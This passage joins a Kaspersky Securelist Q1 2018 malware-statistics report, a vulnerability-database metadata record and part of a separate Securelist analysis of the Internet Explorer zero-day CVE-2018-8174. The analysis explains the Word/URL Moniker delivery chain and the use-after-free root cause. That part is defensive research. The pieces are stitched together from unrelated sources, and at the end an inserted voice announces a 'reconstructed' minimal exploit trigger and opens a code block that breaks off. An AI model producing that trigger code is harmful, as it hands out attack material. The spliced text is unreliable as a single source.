This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n| | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well as Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. 
As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and locks the smartphone screen with a PIN if an attempt is made to remove them. If no PIN is set (could also be a graphic, numeric, or biometric lock), the device is locked. In this case, the only way to restore the smartphone to working order is to reset the factory settings.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users. In second place was Trojan-Ransom.AndroidOS.Fusob.h, having held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. 
Incidentally, Egat.d is a pared-down version of Zebt.a; both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000). \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader of recent years, browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications that the count can only be compared with the number of Adobe Flash vulnerabilities found in earlier years. 
But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>), a stack buffer overflow in Equation Editor, a rather old component of the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Moreover, the bytecode processed by Equation Editor allows various obfuscations, which increases the chances of bypassing protection and launching a successful attack (Kaspersky Lab's Equation file format parser handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, and CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by the South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (reportedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. 
In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits for vulnerabilities patched by the MS17-010 update (the exploits for [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can also be infected._\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Dridex Trojan were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is the fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was hosted on the same network infrastructure as Dridex, suggesting a close link between the two families. Emotet has since lost its banking functions and is used by attackers as a spam bot and loader, with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). 
As a result, the malware was rebranded FriedEx.\n\nQ1 saw the arrest of the head of the criminal group responsible for the Carbanak and Cobalt malware attacks, as [reported by Europol](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>). Starting in 2013, the criminal group attacked more than 40 organizations, causing damage to the financial industry estimated at more than EUR 1 billion. The main attack vector was to penetrate the target organization's network by sending employees spear-phishing messages with malicious attachments. Having penetrated the internal network via the infected computers, the cybercriminals gained access to the ATM control servers, and through them to the ATMs themselves. Access to the infrastructure, servers, and ATMs allowed the cybercriminals to dispense cash without the use of bank cards, transfer money from the organization to criminal accounts, and inflate account balances, with money mules used to collect the proceeds.\n\n#### Financial threat statistics\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
As of Q1 2017, the statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q1 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 204,448 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171350/180511-it-threats-q1-18-statistics-12.png>)\n\n_Number of unique users attacked by financial malware, Q1 2018_\n\n##### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171359/180511-it-threats-q1-18-statistics-13.png>)\n\n**_Geography of banking malware attacks in Q1 2018 (percentage of attacked users)_**\n\n**TOP 10 countries by percentage of attacked users**\n\n | **Country*** | **% of users attacked**** \n---|---|--- \n1 | Cameroon | 2.1 \n2 | Germany | 1.7 \n3 | South Korea | 1.5 \n4 | Libya | 1.5 \n5 | Togo | 1.5 \n6 | Armenia | 1.4 \n7 | Georgia | 1.4 \n8 | Moldova | 1.2 \n9 | Kyrgyzstan | 1.2 \n10 | Indonesia | 1.1 \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data. \n* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000). \n** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\n**TOP 10 malware families used to attack online banking users in Q1 2018 (by share of attacked users):**\n\n | **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 28.0% \n2 | Nymaim | Trojan.Win32.Nymaim | 20.3% \n3 | Caphaw | Backdoor.Win32.Caphaw | 15.2% \n4 | SpyEye | Backdoor.Win32.SpyEye | 11.9% \n5 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 4.5% \n6 | Emotet | Backdoor.Win32.Emotet | 2.4% \n7 | Neurevt | Trojan.Win32.Neurevt | 2.3% \n8 | Shiz | Backdoor.Win32.Shiz | 2.1% \n9 | Gozi | Trojan.Win32.Gozi | 1.9% \n10 | ZAccess | Backdoor.Win32.ZAccess | 1.3% \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2018, TrickBot departed the rating to be replaced by Emotet (2.4%), also known as _Heodo_. Trojan.Win32.Zbot (28%) and Trojan.Win32.Nymaim (20.3%) remain in the lead, while Trojan.Win32.Neurevt (2.3%), also known as Betabot, suffered a major slide. Meanwhile, Caphaw (15.2%) and NeutrinoPOS (4.5%) climbed significantly, reflecting their increased activity in Q1.\n\n### Cryptoware programs\n\n#### Q1 events\n\nQ1 2018 passed without major incidents or mass cryptoware epidemics. The highlight was perhaps the emergence and widespread occurrence of a new Trojan called [GandCrab](<https://threatpost.com/tag/gandcrab-ransomware/>). Notable features of the malware include:\n\n * Use of C&C servers in the .bit domain zone (this top-level domain is supported by an alternative decentralized DNS system based on Namecoin technology)\n * Ransom demand in the cryptocurrency Dash\n\nGandCrab was first detected in January. The cybercriminals behind it used spam emails and exploit kits to deliver the cryptoware to victim computers.\n\nThe RaaS (ransomware as a service) distribution model continues to attract malware developers. 
In February, for example, a new piece of ransomware called [Data Keeper](<https://securelist.ru/data-keeper-ransomware/88883/>) appeared, which any cybercriminal who so desired could distribute. Via a special resource on the Tor network, the creators of Data Keeper made it possible to generate executable files of the Trojan for subsequent distribution by "affiliate program" participants. A dangerous feature of this malware is its ability to propagate automatically inside a local network. Despite this, Data Keeper did not achieve widespread distribution in Q1.\n\nOne notable success in the fight against cryptoware came from Europe: with the assistance of Kaspersky Lab, Belgian police [managed to locate and confiscate](<https://www.europol.europa.eu/newsroom/news/no-more-ransom-update-belgian-federal-police-releases-free-decryption-keys-for-cryakl-ransomware>) a server used by the masterminds behind the Cryakl Trojan. Following the operation, [Kaspersky Lab was given](<https://www.kaspersky.com/about/press-releases/2018_no-more-ransom-update>) several private RSA keys required to decrypt files encrypted with certain versions of the Trojan. As a result, we were able to develop a [tool](<https://support.kaspersky.com/viruses/disinfection/10556>) to assist victims.\n\n#### Number of new modifications\n\nIn Q1 2018, several new cryptors appeared, but only one, GandCrab, was assigned a new family in our classification. The rest, which are not widely spread, continue to be detected with generic verdicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171409/180511-it-threats-q1-18-statistics-14.png>)\n\n_Number of new cryptoware modifications, Q2 2017 – Q1 2018_\n\nThe number of new modifications fell sharply against previous quarters. 
The trend indicates that cybercriminals using this type of malware are becoming less active.\n\n#### Number of users attacked by Trojan cryptors\n\nDuring the reporting period, Kaspersky Lab products blocked cryptoware attacks on the computers of 179,934 unique users. Despite fewer new Trojan modifications, the number of attacked users did not fall against Q3.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171418/180511-it-threats-q1-18-statistics-15.png>)\n\n_Number of unique users attacked by cryptors, Q1 2018_\n\n#### Geography of attacks\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171429/180511-it-threats-q1-18-statistics-16.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n | **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Uzbekistan | 1.12 \n2 | Angola | 1.11 \n3 | Vietnam | 1.04 \n4 | Venezuela | 0.95 \n5 | Indonesia | 0.95 \n6 | Pakistan | 0.93 \n7 | China | 0.87 \n8 | Azerbaijan | 0.75 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe makeup of the rating differs markedly from 2017. That said, most positions were again filled by Asian countries, while Europe did not have a single representative in the TOP 10 countries attacked by cryptors.\n\nDespite not making the TOP 10 last year, Uzbekistan (1.12%) and Angola (1.11%) came first and second. 
Vietnam (1.04%) moved from second to third, Indonesia (0.95%) from third to fifth, and China (0.87%) from fifth to seventh, while Venezuela (0.95%) climbed from eighth to fourth.\n\n**TOP 10 most widespread cryptor families**\n\n | **Name** | **Verdicts*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 38.33 \n2 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 4.07 \n3 | Cerber | Trojan-Ransom.Win32.Zerber | 4.06 \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 2.99 \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.77 \n6 | Shade | Trojan-Ransom.Win32.Shade | 2.61 \n7 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.64 \n8 | Crysis | Trojan-Ransom.Win32.Crusis | 1.62 \n9 | Locky | Trojan-Ransom.Win32.Locky | 1.23 \n10 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.15 \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThis quarter, the rating is again topped by WannaCry (38.33%), extending its already impressive lead. Second place was claimed by PolyRansom (4.07%), also known as VirLock, a worm that has been around for a while. This malware replaces user files with modified instances of its own body, placing the victim's data inside these copies in encrypted form. 
Statistics show that a new modification detected in December immediately began to attack user computers.\n\nThe remaining TOP 10 positions are taken by Trojans already known from previous reports: Cerber, Cryakl, Purgen, Crysis, Locky, and Shade.\n\n### Countries that are sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2018, Kaspersky Lab solutions blocked **796,806,112** attacks launched from Internet resources located in 194 countries worldwide. **282,807,433** unique URLs were recognized as malicious by Web Anti-Virus components. These indicators are significantly higher than in previous quarters. This is largely explained by the large number of detections triggered by attempts to download web miners, which came to prominence towards the end of last year and continue to outweigh other web threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171439/180511-it-threats-q1-18-statistics-17.png>)\n\n_Distribution of web attack sources by country, Q1 2018_\n\nThis quarter, Web Anti-Virus was most active on resources located in the US (39.14%). 
Canada, China, Ireland, and Ukraine dropped out of the TOP 10, to be replaced by Luxembourg (1.33%), Israel (0.99%), Sweden (0.96%), and Singapore (0.91%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n | **Country*** | **% of attacked users**** \n---|---|--- \n1 | Belarus | 40.90 \n2 | Ukraine | 40.32 \n3 | Algeria | 39.69 \n4 | Albania | 37.33 \n5 | Moldova | 37.17 \n6 | Greece | 36.83 \n7 | Armenia | 36.78 \n8 | Azerbaijan | 35.13 \n9 | Kazakhstan | 34.64 \n10 | Russia | 34.56 \n11 | Kyrgyzstan | 33.77 \n12 | Venezuela | 33.10 \n13 | Uzbekistan | 31.52 \n14 | Georgia | 31.40 \n15 | Latvia | 29.85 \n16 | Tunisia | 29.77 \n17 | Romania | 29.09 \n18 | Qatar | 28.71 \n19 | Vietnam | 28.66 \n20 | Serbia | 28.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.69% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171448/180511-it-threats-q1-18-statistics-18.png>)\n\n_Geography of malicious web attacks in Q1 2018 (percentage of attacked users)_\n\nThe countries with the safest surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%), and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.). _\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q1 2018, our File Anti-Virus detected **187,597,494** malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only **Malware-class** attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n | **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.03 \n2 | Afghanistan | 56.02 \n3 | Yemen | 54.99 \n4 | Tajikistan | 53.08 \n5 | Algeria | 49.07 \n6 | Turkmenistan | 48.68 \n7 | Ethiopia | 48.21 \n8 | Mongolia | 46.84 \n9 | Kyrgyzstan | 46.53 \n10 | Sudan | 46.44 \n11 | Vietnam | 46.38 \n12 | Syria | 46.12 \n13 | Rwanda | 46.09 \n14 | Laos | 45.66 \n15 | Libya | 45.50 \n16 | Djibouti | 44.96 \n17 | Iraq | 44.65 \n18 | Mauritania | 44.55 \n19 | Kazakhstan | 44.19 \n20 | Bangladesh | 44.15 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000). 
\n** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat in Q1.\n\nThe figure for Russia was 30.92%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171457/180511-it-threats-q1-18-statistics-19.png>)\n\n**The safest countries in terms of infection risk included** Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czech Republic (7.89%), Ireland (6.86%), and Japan (5.79%).
ID SECURELIST:D7795824A5A02E1E45E51294D78CEBC2 Type securelist Title IT threat evolution Q1 2018. Statistics Published 2018-05-14T10:00:30 Modified 2018-05-14T10:00:30 CVSS 9.3 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/) Href https://securelist.com/it-threat-evolution-q1-2018-statistics/85541/

Lastseen 2018-05-10T11:03:43 BulletinFamily blog CVEs CVE-2014-6332, CVE-2016-0189, CVE-2017-0199, CVE-2017-8570, CVE-2017-8759, CVE-2018-8174
Description
In late April 2018, a new zero-day vulnerability for Internet Explorer (IE) was found using our sandbox, more than two years since the last in-the-wild example (CVE-2016-0189). This particular vulnerability and the subsequent exploit are interesting for many reasons. The following article examines the core reasons behind the latest vulnerability, CVE-2018-8174.\n\n### **Searching for the zero day**\n\nOur story begins on VirusTotal (VT), where someone uploaded an interesting exploit on April 18, 2018. 
This exploit was detected by several AV vendors, including Kaspersky, specifically by our generic heuristic logic for some older Microsoft Word exploits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133136/180508-the-king-is-dead-cve-18-1.png>)\n\n_VirusTotal scan results for CVE-2018-8174_\n\nAfter the malicious sample was processed in our [sandbox system](<https://www.kaspersky.com/enterprise-security/wiki-section/products/sandbox>), we noticed that a fully patched version of Microsoft Word was successfully exploited. From this point we began a deeper analysis of the exploit. Let's take a look at the full infection chain:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133144/180508-the-king-is-dead-cve-18-2.png>)\n\n_Infection chain_\n\nThe infection chain consists of the following steps:\n\n * A victim receives a malicious Microsoft Word document.\n * After opening the malicious document, a second stage of the exploit is downloaded: an HTML page containing VBScript code.\n * The VBScript code triggers a Use After Free (UAF) vulnerability and executes shellcode.\n\n### **Initial analysis**\n\nWe'll start our analysis with the initial Rich Text Format (RTF) document that was used to deliver the actual exploit for IE. It contains only one object, and its contents are obfuscated using a known obfuscation technique we call "[nibble drop](<https://securelist.com/disappearing-bytes/84017/>)".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133151/180508-the-king-is-dead-cve-18-3.png>)\n\n_Obfuscated object data in RTF document_\n\nAfter deobfuscation and hex-decoding of the object data, we can see that this is an OLE object that contains a [URL Moniker](<https://msdn.microsoft.com/ru-ru/en-en/library/windows/desktop/ms688580\(v=vs.85\).aspx>) CLSID. 
Because of this, the exploit initially resembles an older vulnerability leveraging the Microsoft HTA handler ([CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>)).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133158/180508-the-king-is-dead-cve-18-4.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133205/180508-the-king-is-dead-cve-18-5.png>)\n\n_URL Moniker is used to load an IE exploit_\n\nWith the CVE-2017-0199 vulnerability, Word tries to execute the file with the default file handler based on its attributes, one of which is the Content-Type HTTP header in the server's response. Because the default handler for the "application/hta" Content-Type is mshta.exe, it is chosen as the OLE server to run the script unrestricted. This allows an attacker to directly call ShellExecute and launch a payload of their choice.\n\nHowever, if we follow the embedded URL in the latest exploit, we can see that the content type in the server's response is not "application/hta", which was a requirement for CVE-2017-0199 exploitation, but rather "text/html". The default OLE server for "text/html" is mshtml.dll, the library that contains the rendering engine behind Internet Explorer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133212/180508-the-king-is-dead-cve-18-6.png>)\n\n_WINWORD.exe querying the registry for the correct OLE server_\n\nFurthermore, the page contains VBScript, which is loaded with a safemode flag set to its default value, '0xE'. 
Because this prevents an attacker from directly executing a payload, as was possible with the HTA handler, an Internet Explorer exploit is needed to get around it.\n\nUsing a URL moniker like this to load a remote web page is still possible because Microsoft's patch for the earlier Moniker-related vulnerabilities (CVE-2017-0199, CVE-2017-8570 and CVE-2017-8759) did not remove the mechanism itself; it introduced an activation filter, which allows applications to specify which COM objects are restricted from being instantiated at runtime.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133220/180508-the-king-is-dead-cve-18-7.png>)\n\n_Some of the COM objects that IActivationFilter in MSO.dll restricts from being created_\n\nAt the time of this analysis, the list of filtered CLSIDs consisted of 16 entries. The MSHTML CLSID ({25336920-03F9-11CF-8FD0-00AA00686F13}) is not in the list, which is why the MSHTML COM server is successfully created in the Word context.\n\nThis is where it becomes interesting. Despite a Word document being the initial attack vector, the vulnerability is actually in VBScript, not in Microsoft Word. This is the first time we've seen a URL Moniker used to load an IE exploit, and we believe this technique will be used heavily by malware authors in the future. 
This technique allows one to load and render a web page using the IE engine, even if the default browser on the victim's machine is set to something else.\n\nThe VBScript in the downloaded HTML page has both its function names and its integer values obfuscated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133228/180508-the-king-is-dead-cve-18-8.png>)\n\n_Obfuscated IE exploit_\n\n### **Vulnerability root cause analysis**\n\nFor the root cause analysis we only need to look at the first function ('TriggerVuln') in the deobfuscated version, which is called right after 'RandomizeValues' and 'CookieCheck'.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133234/180508-the-king-is-dead-cve-18-9.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133240/180508-the-king-is-dead-cve-18-10.png>)\n\n_Vulnerability trigger procedure after deobfuscation_\n\nTo achieve the desired heap layout and to guarantee that the freed class object's memory will be reused by a 'ClassToReuse' object, the exploit first allocates a number of class objects. 
To trigger the vulnerability, this code can be minimized to the following proof-of-concept (PoC):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133249/180508-the-king-is-dead-cve-18-11.png>)\n\n_CVE-2018-8174 proof of concept_\n\nWhen we then launch this PoC in Internet Explorer with page heap enabled, we observe a crash at the OLEAUT32!VariantClear function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133256/180508-the-king-is-dead-cve-18-12.png>)\n\n_Access violation on a call into freed memory_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133304/180508-the-king-is-dead-cve-18-13.png>)\n\n_The freed memory pointer is reused when the second array (ArrB) is destroyed_\n\nWith this PoC we were able to trigger a use-after-free: both ArrA(1) and ArrB(1) ended up referencing the same 'ClassVuln' object in memory. This happens because when "Erase ArrA" is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.\n\nSafeArrayDestroy checks that the pointer to the [tagSafeArray structure](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms221482\(v=vs.85\).aspx>) is not NULL and that its lock count, stored in the cLocks field, is zero, and then calls ReleaseResources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133315/180508-the-king-is-dead-cve-18-14.png>)\n\n_The VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object_\n\nReleaseResources, in turn, checks the fFeatures flags, and since this is an array of VARIANTs (FADF_VARIANT), it calls VariantClear for each element; that function performs the necessary deinitialization and invokes the relevant class destructor where an element holds an object. 
In this case, VBScriptClass::Release is called to destroy the object correctly and handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133323/180508-the-king-is-dead-cve-18-15.png>)\n\n_Root cause of CVE-2018-8174: 'refCount' is checked only once, before the TerminateClass call_\n\nThis is the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and, in the PoC, actually is) incremented in a user-defined Class_Terminate handler invoked via TerminateClass, no further check is made before the class object is finally freed.\n\n[Class_Terminate](<https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed>) is the class destructor event of VBScript and classic Visual Basic (in Visual Basic .NET it was replaced by the 'Finalize' procedure). It is used to free acquired resources during object destruction and is executed as soon as the object is set to Nothing or there are no more references to it. In our case, ClassVuln defines its own Class_Terminate, so when VBScriptClass::TerminateClass is called, execution is dispatched to that user-defined method. Inside it, another reference to the ArrA(1) member is created: ArrB(1) is set to reference ArrA(1), which holds the soon-to-be-freed ClassVuln object.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133332/180508-the-king-is-dead-cve-18-16.png>)\n\n_Crash due to calling an invalid virtual method when freeing the second object_\n\nAfter the Class_Terminate sub finishes, the object at ArrA(1) is freed, but ArrB(1) still holds a reference to that freed class object. 
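The minimized trigger that the analysis above describes, written out as an added example: it is a reconstruction from the steps in this section, not a copy of the PoC screenshot or of the exploit's own code. The class and array names (ClassVuln, ArrA, ArrB, TriggerVuln) follow the text; the heap-grooming ClassToReuse allocations of the real exploit are deliberately left out, and the HTML wrapper is an assumption so that the script runs under the IE engine rather than under cscript.

```html
<!-- Minimal CVE-2018-8174 trigger, reconstructed from the root cause analysis.
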